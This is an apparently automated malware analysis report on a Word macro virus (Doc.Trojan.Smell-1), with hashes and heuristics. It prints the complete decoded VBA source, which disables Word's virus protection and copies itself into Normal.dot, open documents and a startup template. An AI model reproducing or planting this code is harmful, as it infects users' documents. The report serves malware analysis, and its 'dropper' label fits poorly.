Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd543da46f78bd35…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.5 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 20c0647eaa373c718b32855ea67394d2
SHA-1: 536d498cd746fd409dd3975dc7124873da2e5a98
SHA-256: dd543da46f78bd35c9cea48023060ff284214bdf55903d25f7d3299e08cea663
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by several critical- and high-severity heuristic firings, including a ClamAV detection. Its Document_Open macro runs automatically when the document is opened, first turning off Word's virus protection and save prompts. It then copies its own macro code into the Normal template and saves the document as a template named 'smell.dot' in Word's startup folder, so the code is loaded again in later Word sessions; this persistence and self-copying behaviour is characteristic of a dropper.

Heuristics (3)

  • ClamAV: Doc.Trojan.Smell-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Smell-1
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3226 bytes
SHA-256: d34133957fb147ee9188c0d76885bd0431deaf5d54ea71ba28343997397cd54b
Detection: ClamAV: Doc.Trojan.Smell-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public WhoAmI As String
Public SmellDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public DocThere As Boolean

Private Sub Document_Open()
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
Call ID_Status
Call Install_Status
If WhoAmI = "document" Then Call DocCode
If WhoAmI = "normal" Then Call NormCode
If WhoAmI = "smell" Then Call SmellCode
End Sub

Function ID_Status()
On Error Resume Next

If MacroContainer = NormalTemplate Then
    WhoAmI = "normal"
    GoTo checkout
End If
If MacroContainer = ActiveDocument Then WhoAmI = "document"
If MacroContainer = "smell.dot" Then WhoAmI = "smell"
checkout:
End Function

Function Install_Status()
On Error Resume Next
If Dir(Application.StartupPath + "\smell.dot") = "smell.dot" Then SmellDot = True
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Smell" Then DocInstalled = True
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(i).Name = "Smell" Then NormInstalled = True
Next i
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
    GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function

Function DocCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
If SmellDot = False Then
    ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
    FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function NormCode()
On Error Resume Next
Call Check_For_Doc
If DocInstalled = False And DocThere = True Then
    ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
If SmellDot = False And DocThere = True Then
    ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
    FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function Check_For_Doc()
On Error GoTo docek
If ActiveDocument.Name <> "" Then
    DocThere = True
End If
GoTo over
docek:
DocThere = False
over:
End Function

Function SmellCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    NormalTemplate.Save
End If
If DocInstalled = False Then
    ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
End Function